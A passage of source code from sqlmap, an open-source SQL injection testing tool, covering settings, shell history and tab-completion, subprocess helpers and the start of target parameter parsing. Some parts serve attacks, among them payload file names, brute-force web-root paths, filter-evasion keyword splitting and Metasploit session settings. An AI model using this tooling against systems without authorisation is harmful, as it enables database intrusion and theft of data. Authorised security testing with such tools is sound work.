r\"(?i)Content-Disposition:[^;]+;\\s*name=\"\n\n# Regular expression used for detecting Array-like POST data\nARRAY_LIKE_RECOGNITION_REGEX = r\"(\\A|%s)(\\w+)\\[\\d*\\]=.+%s\\2\\[\\d*\\]=\" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)\n\n# Default POST data content-type\nDEFAULT_CONTENT_TYPE = \"application/x-www-form-urlencoded; charset=utf-8\"\n\n# Raw text POST data content-type\nPLAIN_TEXT_CONTENT_TYPE = \"text/plain; charset=utf-8\"\n\n# Length used while checking for existence of Suhosin-patch (like) protection mechanism\nSUHOSIN_MAX_VALUE_LENGTH = 512\n\n# Minimum size of an (binary) entry before it can be considered for dumping to disk\nMIN_BINARY_DISK_DUMP_SIZE = 100\n\n# Filenames of payloads xml files (in order of loading)\nPAYLOAD_XML_FILES = (\"boolean_blind.xml\", \"error_based.xml\", \"inline_query.xml\", \"stacked_queries.xml\", \"time_blind.xml\", \"union_query.xml\")\n\n# Regular expression used for extracting form tags\nFORM_SEARCH_REGEX = r\"(?si)<form(?!.+<form).+?</form>\"\n\n# Maximum number of lines to save in history file\nMAX_HISTORY_LENGTH = 1000\n\n# Minimum field entry length needed for encoded content (hex, base64,...) check\nMIN_ENCODED_LEN_CHECK = 5\n\n# Timeout in seconds in which Metasploit remote session has to be initialized\nMETASPLOIT_SESSION_TIMEOUT = 120\n\n# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html\nLOBLKSIZE = 2048\n\n# Prefix used to mark special variables (e.g. keywords, having special chars, etc.)\nEVALCODE_ENCODED_PREFIX = \"EVAL_\"\n\n# Reference: https://en.wikipedia.org/wiki/Zip_(file_format)\nZIP_HEADER = b\"\\x50\\x4b\\x03\\x04\"\n\n# Reference: http://www.cookiecentral.com/faq/#3.5\nNETSCAPE_FORMAT_HEADER_COOKIES = \"# Netscape HTTP Cookie File.\"\n\n# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens\nCSRF_TOKEN_PARAMETER_INFIXES = (\"csrf\", \"xsrf\", \"token\")\n\n# Prefixes used in brute force search for web server document root\nBRUTE_DOC_ROOT_PREFIXES = {\n    OS.LINUX: (\"/var/www\", \"/usr/local/apache\", \"/usr/local/apache2\", \"/usr/local/www/apache22\", \"/usr/local/www/apache24\", \"/usr/local/httpd\", \"/var/www/nginx-default\", \"/srv/www\", \"/var/www/%TARGET%\", \"/var/www/vhosts/%TARGET%\", \"/var/www/virtual/%TARGET%\", \"/var/www/clients/vhosts/%TARGET%\", \"/var/www/clients/virtual/%TARGET%\"),\n    OS.WINDOWS: (\"/xampp\", \"/Program Files/xampp\", \"/wamp\", \"/Program Files/wampp\", \"/Apache/Apache\", \"/apache\", \"/Program Files/Apache Group/Apache\", \"/Program Files/Apache Group/Apache2\", \"/Program Files/Apache Group/Apache2.2\", \"/Program Files/Apache Group/Apache2.4\", \"/Inetpub/wwwroot\", \"/Inetpub/wwwroot/%TARGET%\", \"/Inetpub/vhosts/%TARGET%\")\n}\n\n# Suffixes used in brute force search for web server document root\nBRUTE_DOC_ROOT_SUFFIXES = (\"\", \"html\", \"htdocs\", \"httpdocs\", \"php\", \"public\", \"src\", \"site\", \"build\", \"web\", \"www\", \"data\", \"sites/all\", \"www/build\")\n\n# String used for marking target name inside used brute force web server document root\nBRUTE_DOC_ROOT_TARGET_MARK = \"%TARGET%\"\n\n# Character used as a boundary in kb.chars (preferably less frequent letter)\nKB_CHARS_BOUNDARY_CHAR = 'q'\n\n# Letters of lower frequency used in kb.chars\nKB_CHARS_LOW_FREQUENCY_ALPHABET = \"zqxjkvbp\"\n\n# Printable bytes\nPRINTABLE_BYTES = set(bytes(string.printable, \"ascii\") if six.PY3 else string.printable)\n\n# SQL keywords used for splitting in HTTP chunked transfer encoded requests (switch --chunk)\nHTTP_CHUNKED_SPLIT_KEYWORDS = (\"SELECT\", \"UPDATE\", \"INSERT\", \"FROM\", \"LOAD_FILE\", \"UNION\", \"information_schema\", \"sysdatabases\", \"msysaccessobjects\", \"msysqueries\", \"sysmodules\")\n\n# CSS style used in HTML dump format\nHTML_DUMP_CSS_STYLE = \"\"\"<style>\ntable{\n    margin:10;\n    background-color:#FFFFFF;\n    font-family:verdana;\n    font-size:12px;\n    align:center;\n}\nthead{\n    font-weight:bold;\n    background-color:#4F81BD;\n    color:#FFFFFF;\n}\ntr:nth-child(even) {\n    background-color: #D3DFEE\n}\ntd{\n    font-size:12px;\n}\nth{\n    font-size:12px;\n}\n</style>\"\"\"\n\n# Leaving (dirty) possibility to change values from here (e.g. `export SQLMAP__MAX_NUMBER_OF_THREADS=20`)\nfor key, value in os.environ.items():\n    if key.upper().startswith(\"%s_\" % SQLMAP_ENVIRONMENT_PREFIX):\n        _ = key[len(SQLMAP_ENVIRONMENT_PREFIX) + 1:].upper()\n        if _ in globals():\n            original = globals()[_]\n            if isinstance(original, int):\n                try:\n                    globals()[_] = int(value)\n                except ValueError:\n                    pass\n            elif isinstance(original, bool):\n                globals()[_] = value.lower() in ('1', 'true')\n            elif isinstance(original, (list, tuple)):\n                globals()[_] = [__.strip() for __ in _.split(',')]\n            else:\n                globals()[_] = value\n\n# Installing \"reversible\" unicode (decoding) error handler\ndef _reversible(ex):\n    if INVALID_UNICODE_PRIVATE_AREA:\n        return (u\"\".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)\n    else:\n        return (u\"\".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)\n\ncodecs.register_error(\"reversible\", _reversible)\n"
  },
  {
    "path": "sqlmap/lib/core/shell.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport atexit\nimport os\n\nfrom lib.core import readlineng as readline\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.enums import AUTOCOMPLETE_TYPE\nfrom lib.core.enums import OS\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import MAX_HISTORY_LENGTH\n\ntry:\n    import rlcompleter\n\n    class CompleterNG(rlcompleter.Completer):\n        def global_matches(self, text):\n            \"\"\"\n            Compute matches when text is a simple name.\n            Return a list of all names currently defined in self.namespace\n            that match.\n            \"\"\"\n\n            matches = []\n            n = len(text)\n\n            for ns in (self.namespace,):\n                for word in ns:\n                    if word[:n] == text:\n                        matches.append(word)\n\n            return matches\nexcept:\n    readline._readline = None\n\ndef readlineAvailable():\n    \"\"\"\n    Check if the readline is available. By default\n    it is not in Python default installation on Windows\n    \"\"\"\n\n    return readline._readline is not None\n\ndef clearHistory():\n    if not readlineAvailable():\n        return\n\n    readline.clear_history()\n\ndef saveHistory(completion=None):\n    try:\n        if not readlineAvailable():\n            return\n\n        if completion == AUTOCOMPLETE_TYPE.SQL:\n            historyPath = paths.SQL_SHELL_HISTORY\n        elif completion == AUTOCOMPLETE_TYPE.OS:\n            historyPath = paths.OS_SHELL_HISTORY\n        elif completion == AUTOCOMPLETE_TYPE.API:\n            historyPath = paths.API_SHELL_HISTORY\n        else:\n            historyPath = paths.SQLMAP_SHELL_HISTORY\n\n        try:\n            with open(historyPath, \"w+\"):\n                pass\n        except:\n            pass\n\n        readline.set_history_length(MAX_HISTORY_LENGTH)\n        try:\n            readline.write_history_file(historyPath)\n        except IOError as ex:\n            warnMsg = \"there was a problem writing the history file '%s' (%s)\" % (historyPath, getSafeExString(ex))\n            logger.warning(warnMsg)\n    except KeyboardInterrupt:\n        pass\n\ndef loadHistory(completion=None):\n    if not readlineAvailable():\n        return\n\n    clearHistory()\n\n    if completion == AUTOCOMPLETE_TYPE.SQL:\n        historyPath = paths.SQL_SHELL_HISTORY\n    elif completion == AUTOCOMPLETE_TYPE.OS:\n        historyPath = paths.OS_SHELL_HISTORY\n    elif completion == AUTOCOMPLETE_TYPE.API:\n        historyPath = paths.API_SHELL_HISTORY\n    else:\n        historyPath = paths.SQLMAP_SHELL_HISTORY\n\n    if os.path.exists(historyPath):\n        try:\n            readline.read_history_file(historyPath)\n        except IOError as ex:\n            warnMsg = \"there was a problem loading the history file '%s' (%s)\" % (historyPath, getSafeExString(ex))\n            logger.warning(warnMsg)\n        except UnicodeError:\n            if IS_WIN:\n                warnMsg = \"there was a problem loading the history file '%s'. \" % historyPath\n                warnMsg += \"More info can be found at 'https://github.com/pyreadline/pyreadline/issues/30'\"\n                logger.warning(warnMsg)\n\ndef autoCompletion(completion=None, os=None, commands=None):\n    if not readlineAvailable():\n        return\n\n    if completion == AUTOCOMPLETE_TYPE.OS:\n        if os == OS.WINDOWS:\n            # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands\n            completer = CompleterNG({\n                \"attrib\": None, \"copy\": None, \"del\": None,\n                \"dir\": None, \"echo\": None, \"fc\": None,\n                \"label\": None, \"md\": None, \"mem\": None,\n                \"move\": None, \"net\": None, \"netstat -na\": None,\n                \"tree\": None, \"truename\": None, \"type\": None,\n                \"ver\": None, \"vol\": None, \"xcopy\": None,\n            })\n\n        else:\n            # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands\n            completer = CompleterNG({\n                \"cat\": None, \"chmod\": None, \"chown\": None,\n                \"cp\": None, \"cut\": None, \"date\": None, \"df\": None,\n                \"diff\": None, \"du\": None, \"echo\": None, \"env\": None,\n                \"file\": None, \"find\": None, \"free\": None, \"grep\": None,\n                \"id\": None, \"ifconfig\": None, \"ls\": None, \"mkdir\": None,\n                \"mv\": None, \"netstat\": None, \"pwd\": None, \"rm\": None,\n                \"uname\": None, \"whoami\": None,\n            })\n\n        readline.set_completer(completer.complete)\n        readline.parse_and_bind(\"tab: complete\")\n\n    elif commands:\n        completer = CompleterNG(dict(((_, None) for _ in commands)))\n        readline.set_completer_delims(' ')\n        readline.set_completer(completer.complete)\n        readline.parse_and_bind(\"tab: complete\")\n\n    loadHistory(completion)\n    atexit.register(saveHistory, completion)\n"
  },
  {
    "path": "sqlmap/lib/core/subprocessng.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport errno\nimport os\nimport subprocess\nimport time\n\nfrom lib.core.compat import buffer\nfrom lib.core.convert import getBytes\nfrom lib.core.settings import IS_WIN\n\nif IS_WIN:\n    try:\n        from win32file import ReadFile, WriteFile\n        from win32pipe import PeekNamedPipe\n    except ImportError:\n        pass\n    import msvcrt\nelse:\n    import select\n    import fcntl\n\ndef blockingReadFromFD(fd):\n    # Quick twist around original Twisted function\n    # Blocking read from a non-blocking file descriptor\n    output = b\"\"\n\n    while True:\n        try:\n            output += os.read(fd, 8192)\n        except (OSError, IOError) as ioe:\n            if ioe.args[0] in (errno.EAGAIN, errno.EINTR):\n                # Uncomment the following line if the process seems to\n                # take a huge amount of cpu time\n                # time.sleep(0.01)\n                continue\n            else:\n                raise\n        break\n\n    if not output:\n        raise EOFError(\"fd %s has been closed.\" % fd)\n\n    return output\n\ndef blockingWriteToFD(fd, data):\n    # Another quick twist\n    while True:\n        try:\n            data_length = len(data)\n            wrote_data = os.write(fd, data)\n        except (OSError, IOError) as io:\n            if io.errno in (errno.EAGAIN, errno.EINTR):\n                continue\n            else:\n                raise\n\n        if wrote_data < data_length:\n            blockingWriteToFD(fd, data[wrote_data:])\n\n        break\n\n# the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/\nclass Popen(subprocess.Popen):\n    def recv(self, maxsize=None):\n        return self._recv('stdout', maxsize)\n\n    def recv_err(self, maxsize=None):\n        return self._recv('stderr', maxsize)\n\n    def send_recv(self, input='', maxsize=None):\n        return self.send(input), self.recv(maxsize), self.recv_err(maxsize)\n\n    def get_conn_maxsize(self, which, maxsize):\n        if maxsize is None:\n            maxsize = 1024\n        elif maxsize < 1:\n            maxsize = 1\n        return getattr(self, which), maxsize\n\n    def _close(self, which):\n        getattr(self, which).close()\n        setattr(self, which, None)\n\n    if IS_WIN:\n        def send(self, input):\n            if not self.stdin:\n                return None\n\n            try:\n                x = msvcrt.get_osfhandle(self.stdin.fileno())\n                (_, written) = WriteFile(x, input)\n            except ValueError:\n                return self._close('stdin')\n            except Exception as ex:\n                if getattr(ex, \"args\", None) and ex.args[0] in (109, errno.ESHUTDOWN):\n                    return self._close('stdin')\n                raise\n\n            return written\n\n        def _recv(self, which, maxsize):\n            conn, maxsize = self.get_conn_maxsize(which, maxsize)\n            if conn is None:\n                return None\n\n            try:\n                x = msvcrt.get_osfhandle(conn.fileno())\n                (read, nAvail, _) = PeekNamedPipe(x, 0)\n                if maxsize < nAvail:\n                    nAvail = maxsize\n                if nAvail > 0:\n                    (_, read) = ReadFile(x, nAvail, None)\n            except (ValueError, NameError):\n                return self._close(which)\n            except Exception as ex:\n                if getattr(ex, \"args\", None) and ex.args[0] in (109, errno.ESHUTDOWN):\n                    return self._close(which)\n                raise\n\n            if self.universal_newlines:\n                read = self._translate_newlines(read)\n            return read\n    else:\n        def send(self, input):\n            if not self.stdin:\n                return None\n\n            if not select.select([], [self.stdin], [], 0)[1]:\n                return 0\n\n            try:\n                written = os.write(self.stdin.fileno(), input)\n            except OSError as ex:\n                if ex.args[0] == errno.EPIPE:  # broken pipe\n                    return self._close('stdin')\n                raise\n\n            return written\n\n        def _recv(self, which, maxsize):\n            conn, maxsize = self.get_conn_maxsize(which, maxsize)\n            if conn is None:\n                return None\n\n            flags = fcntl.fcntl(conn, fcntl.F_GETFL)\n            if not conn.closed:\n                fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n\n            try:\n                if not select.select([conn], [], [], 0)[0]:\n                    return ''\n\n                r = conn.read(maxsize)\n                if not r:\n                    return self._close(which)\n\n                if self.universal_newlines:\n                    r = self._translate_newlines(r)\n                return r\n            finally:\n                if not conn.closed:\n                    fcntl.fcntl(conn, fcntl.F_SETFL, flags)\n\ndef recv_some(p, t=.1, e=1, tr=5, stderr=0):\n    if tr < 1:\n        tr = 1\n    x = time.time() + t\n    y = []\n    r = ''\n    if stderr:\n        pr = p.recv_err\n    else:\n        pr = p.recv\n    while time.time() < x or r:\n        r = pr()\n        if r is None:\n            break\n        elif r:\n            y.append(r)\n        else:\n            time.sleep(max((x - time.time()) / tr, 0))\n    return b''.join(y)\n\ndef send_all(p, data):\n    if not data:\n        return\n\n    data = getBytes(data)\n\n    while len(data):\n        sent = p.send(data)\n        if not isinstance(sent, int):\n            break\n        data = buffer(data[sent:])\n"
  },
  {
    "path": "sqlmap/lib/core/target.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport functools\nimport os\nimport re\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nfrom lib.core.common import Backend\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import intersect\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import normalizeUnicode\nfrom lib.core.common import openFile\nfrom lib.core.common import paramToDict\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import removePostHintPrefix\nfrom lib.core.common import resetCookieJar\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import urldecode\nfrom lib.core.compat import xrange\nfrom lib.core.convert import decodeBase64\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import mergedOptions\nfrom lib.core.data import paths\nfrom lib.core.datatype import InjectionDict\nfrom lib.core.dicts import DBMS_DICT\nfrom lib.core.dump import dumper\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import POST_HINT\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapMissingPrivileges\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.option import _setAuthCred\nfrom lib.core.option import _setDBMS\nfrom lib.core.option import _setKnowledgeBaseAttributes\nfrom lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX\nfrom lib.core.settings import ASTERISK_MARKER\nfrom lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES\nfrom lib.core.settings import CUSTOM_INJECTION_MARK_CHAR\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import HOST_ALIASES\nfrom lib.core.settings import INJECT_HERE_REGEX\nfrom lib.core.settings import JSON_LIKE_RECOGNITION_REGEX\nfrom lib.core.settings import JSON_RECOGNITION_REGEX\nfrom lib.core.settings import MULTIPART_RECOGNITION_REGEX\nfrom lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS\nfrom lib.core.settings import REFERER_ALIASES\nfrom lib.core.settings import RESTORE_MERGED_OPTIONS\nfrom lib.core.settings import RESULTS_FILE_FORMAT\nfrom lib.core.settings import SESSION_SQLITE_FILE\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import UNENCODED_ORIGINAL_VALUE\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import UNKNOWN_DBMS_VERSION\nfrom lib.core.settings import URI_INJECTABLE_REGEX\nfrom lib.core.settings import USER_AGENT_ALIASES\nfrom lib.core.settings import XML_RECOGNITION_REGEX\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.utils.hashdb import HashDB\nfrom thirdparty import six\nfrom thirdparty.odict import OrderedDict\nfrom thirdparty.six.moves import urllib as _urllib\n\ndef _setRequestParams():\n    \"\"\"\n    Check and set the parameters and perform checks on 'data' option for\n    HTTP method POST.\n    \"\"\"\n\n    if conf.direct:\n        conf.parameters[None] = \"direct connection\"\n        return\n\n    hintNames = []\n    testableParameters = False\n\n    # Perform checks on GET parameters\n    if conf.parameters.get(PLACE.GET):\n        parameters = conf.parameters[PLACE.GET]\n        paramDict = paramToDict(PLACE.GET, parameters)\n\n        if paramDict:\n            conf.paramDict[PLACE.GET] = paramDict\n            testableParameters = True\n\n    # Perform checks on POST parameters\n    if conf.method == HTTPMETHOD.POST and conf.data is None:\n        logger.warning(\"detected empty POST body\")\n        conf.data = \"\"\n\n    if conf.data is not None:\n        conf.method = conf.method or HTTPMETHOD.POST\n\n        def process(match, repl):\n            retVal = match.group(0)\n\n            if not (conf.testParameter and match.group(\"name\") not in (removePostHintPrefix(_) for _ in conf.testParameter)) and match.group(\"name\") == match.group(\"name\").strip('\\\\'):\n                retVal = repl\n                while True:\n                    _ = re.search(r\"\\\\g<([^>]+)>\", retVal)\n                    if _:\n                        try:\n                            retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))\n                        except IndexError:\n                            break\n                    else:\n                        break\n                if kb.customInjectionMark in retVal:\n                    hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group(\"name\").strip('\"\\'') if kb.postHint == POST_HINT.JSON_LIKE else match.group(\"name\")))\n\n            return retVal\n\n        if kb.processUserMarks is None and kb.customInjectionMark in conf.data:\n            message = \"custom injection marker ('%s') found in %s \" % (kb.customInjectionMark, conf.method)\n            message += \"body. Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                kb.processUserMarks = choice == 'Y'\n\n                if kb.processUserMarks:\n                    kb.testOnlyCustom = True\n\n        if re.search(JSON_RECOGNITION_REGEX, conf.data):\n            message = \"JSON data found in %s body. \" % conf.method\n            message += \"Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            elif choice == 'Y':\n                kb.postHint = POST_HINT.JSON\n                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):\n                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)\n                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)\n                    conf.data = re.sub(r'(\"(?P<name>[^\"]+)\"\\s*:\\s*\".+?)\"(?<!\\\\\")', functools.partial(process, repl=r'\\g<1>%s\"' % kb.customInjectionMark), conf.data)\n                    conf.data = re.sub(r'(\"(?P<name>[^\"]+)\"\\s*:\\s*)(-?\\d[\\d\\.]*)\\b', functools.partial(process, repl=r'\\g<1>\\g<3>%s' % kb.customInjectionMark), conf.data)\n                    conf.data = re.sub(r'(\"(?P<name>[^\"]+)\"\\s*:\\s*)((true|false|null))\\b', functools.partial(process, repl=r'\\g<1>\\g<3>%s' % kb.customInjectionMark), conf.data)\n                    for match in re.finditer(r'(?P<name>[^\"]+)\"\\s*:\\s*\\[([^\\]]+)\\]', conf.data):\n                        if not (conf.testParameter and match.group(\"name\") not in conf.testParameter):\n                            _ = match.group(2)\n                            if kb.customInjectionMark not in _:  # Note: only for unprocessed (simple) forms - i.e. non-associative arrays (e.g. [1,2,3])\n                                _ = re.sub(r'(\"[^\"]+)\"', r'\\g<1>%s\"' % kb.customInjectionMark, _)\n                                _ = re.sub(r'(\\A|,|\\s+)(-?\\d[\\d\\.]*\\b)', r'\\g<0>%s' % kb.customInjectionMark, _)\n                                conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))\n\n        elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):\n            message = \"JSON-like data found in %s body. \" % conf.method\n            message += \"Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            elif choice == 'Y':\n                kb.postHint = POST_HINT.JSON_LIKE\n                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):\n                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)\n                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)\n                    if '\"' in conf.data:\n                        conf.data = re.sub(r'((?P<name>\"[^\"]+\"|\\w+)\\s*:\\s*\"[^\"]+)\"', functools.partial(process, repl=r'\\g<1>%s\"' % kb.customInjectionMark), conf.data)\n                        conf.data = re.sub(r'((?P<name>\"[^\"]+\"|\\w+)\\s*:\\s*)(-?\\d[\\d\\.]*\\b)', functools.partial(process, repl=r'\\g<0>%s' % kb.customInjectionMark), conf.data)\n                    else:\n                        conf.data = re.sub(r\"((?P<name>'[^']+'|\\w+)\\s*:\\s*'[^']+)'\", functools.partial(process, repl=r\"\\g<1>%s'\" % kb.customInjectionMark), conf.data)\n                        conf.data = re.sub(r\"((?P<name>'[^']+'|\\w+)\\s*:\\s*)(-?\\d[\\d\\.]*\\b)\", functools.partial(process, repl=r\"\\g<0>%s\" % kb.customInjectionMark), conf.data)\n\n        elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):\n            message = \"Array-like data found in %s body. \" % conf.method\n            message += \"Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            elif choice == 'Y':\n                kb.postHint = POST_HINT.ARRAY_LIKE\n                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):\n                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)\n                    conf.data = re.sub(r\"(=[^%s]+)\" % DEFAULT_GET_POST_DELIMITER, r\"\\g<1>%s\" % kb.customInjectionMark, conf.data)\n\n        elif re.search(XML_RECOGNITION_REGEX, conf.data):\n            message = \"SOAP/XML data found in %s body. \" % conf.method\n            message += \"Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            elif choice == 'Y':\n                kb.postHint = POST_HINT.SOAP if \"soap\" in conf.data.lower() else POST_HINT.XML\n                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):\n                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)\n                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)\n                    conf.data = re.sub(r\"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\\2)\", functools.partial(process, repl=r\"\\g<1>\\g<4>%s\\g<5>\" % kb.customInjectionMark), conf.data)\n\n        elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):\n            message = \"Multipart-like data found in %s body. \" % conf.method\n            message += \"Do you want to process it? [Y/n/q] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'Q':\n                raise SqlmapUserQuitException\n            elif choice == 'Y':\n                kb.postHint = POST_HINT.MULTIPART\n                if not (kb.processUserMarks and kb.customInjectionMark in conf.data):\n                    conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)\n                    conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)\n                    conf.data = re.sub(r\"(?si)((Content-Disposition[^\\n]+?name\\s*=\\s*[\\\"']?(?P<name>[^\\\"'\\r\\n]+)[\\\"']?).+?)((%s)+--)\" % (\"\\r\\n\" if \"\\r\\n\" in conf.data else '\\n'), functools.partial(process, repl=r\"\\g<1>%s\\g<4>\" % kb.customInjectionMark), conf.data)\n\n        if not kb.postHint:\n            if kb.customInjectionMark in conf.data:  # later processed\n                pass\n            else:\n                place = PLACE.POST\n\n                conf.parameters[place] = conf.data\n                paramDict = paramToDict(place, conf.data)\n\n                if paramDict:\n                    conf.paramDict[place] = paramDict\n                    testableParameters = True\n        else:\n            if kb.customInjectionMark not in conf.data:  # in case that no usable parameter values has been found\n                conf.parameters[PLACE.POST] = conf.data\n\n    kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or \"\")) else kb.processUserMarks\n\n    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or \"\") and conf.url.startswith(\"http\"):\n        warnMsg = \"you've provided target URL without any GET \"\n        warnMsg += \"parameters (e.g. 'http://www.site.com/article.php?id=1') \"\n        warnMsg += \"and without providing any POST parameters \"\n        warnMsg += \"through option '--data'\"\n        logger.warning(warnMsg)\n\n        message = \"do you want to try URI injections \"\n        message += \"in the target URL itself? [Y/n/q] \"\n        choice = readInput(message, default='Y').upper()\n\n        if choice == 'Q':\n            raise SqlmapUserQuitException\n        elif choice == 'Y':\n            conf.url = \"%s%s\" % (conf.url, kb.customInjectionMark)\n            kb.processUserMarks = True\n\n    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):\n        if place == PLACE.CUSTOM_HEADER and any((conf.forms, conf.crawlDepth)):\n            continue\n\n        _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, \"\", value or \"\") if place == PLACE.CUSTOM_HEADER else value or \"\"\n        if kb.customInjectionMark in _:\n            if kb.processUserMarks is None:\n                lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'}\n                message = \"custom injection marker ('%s') found in option \" % kb.customInjectionMark\n                message += \"'%s'. Do you want to process it? [Y/n/q] \" % lut[place]\n                choice = readInput(message, default='Y').upper()\n\n                if choice == 'Q':\n                    raise SqlmapUserQuitException\n                else:\n                    kb.processUserMarks = choice == 'Y'\n\n                    if kb.processUserMarks:\n                        kb.testOnlyCustom = True\n\n                        if \"=%s\" % kb.customInjectionMark in _:\n                            warnMsg = \"it seems that you've provided empty parameter value(s) \"\n                            warnMsg += \"for testing. Please, always use only valid parameter values \"\n                            warnMsg += \"so sqlmap could be able to run properly\"\n                            logger.warning(warnMsg)\n\n            if not kb.processUserMarks:\n                if place == PLACE.URI:\n                    query = _urllib.parse.urlsplit(value).query\n                    if query:\n                        parameters = conf.parameters[PLACE.GET] = query\n                        paramDict = paramToDict(PLACE.GET, parameters)\n\n                        if paramDict:\n                            conf.url = conf.url.split('?')[0]\n                            conf.paramDict[PLACE.GET] = paramDict\n                            testableParameters = True\n                elif place == PLACE.CUSTOM_POST:\n                    conf.parameters[PLACE.POST] = conf.data\n                    paramDict = paramToDict(PLACE.POST, conf.data)\n\n                    if paramDict:\n                        conf.paramDict[PLACE.POST] = paramDict\n                        testableParameters = True\n\n            else:\n                if place == PLACE.URI:\n                    value = conf.url = conf.url.replace('+', \"%20\")  # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5123\n\n                conf.parameters[place] = value\n                conf.paramDict[place] = OrderedDict()\n\n                if place == PLACE.CUSTOM_HEADER:\n                    for index in xrange(len(conf.httpHeaders)):\n                        header, value = conf.httpHeaders[index]\n                        if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, \"\", value):\n                            parts = value.split(kb.customInjectionMark)\n                            for i in xrange(len(parts) - 1):\n                                conf.paramDict[place][\"%s #%d%s\" % (header, i + 1, kb.customInjectionMark)] = \"%s,%s\" % (header, \"\".join(\"%s%s\" % (parts[j], kb.customInjectionMark if i == j else \"\") for j in xrange(len(parts))))\n                            conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, \"\"))\n                else:\n                    parts = 